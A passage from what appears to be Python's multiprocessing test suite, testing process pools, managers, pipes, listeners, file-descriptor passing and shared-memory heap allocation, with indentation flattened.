def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_del_pool(self):
p = self.Pool(1)
wr = weakref.ref(p)
del p
gc.collect()
self.assertIsNone(wr())
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
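# Illustrative sketch, not part of the tests: once registered, each
# typeid above becomes a method on the manager that returns a proxy.
# _demo_mymanager is an assumption introduced here for illustration; the
# real assertions live in _TestMyManager.common() below.
def _demo_mymanager():
    with MyManager() as manager:
        foo = manager.Foo()                 # proxy for a FooBar instance
        assert foo.f() == 'f()'             # call forwarded to the server
        assert list(manager.baz()) == [i * i for i in range(10)]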
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
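# Illustrative sketch: _echo() below drains its connection with the
# two-argument form of iter(), which keeps calling conn.recv_bytes()
# until it returns SENTINEL.  The same idiom with a plain callable:
def _demo_sentinel_iter():
    items = [b'', b'b', b'a']               # b'' plays the role of SENTINEL
    assert list(iter(items.pop, b'')) == [b'a', b'b']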
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
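# Illustrative sketch, not part of the test suite: a Connection preserves
# message boundaries, which is exactly what test_dont_merge above relies
# on.  Both ends of a Pipe can be used from one process for demonstration.
def _demo_message_boundaries():
    a, b = multiprocessing.Pipe()
    b.send_bytes(b'a')
    b.send_bytes(b'b')
    assert a.recv_bytes() == b'a'           # delivered one message at a
    assert a.recv_bytes() == b'b'           # time, never merged to b'ab'
    a.close()
    b.close()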
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
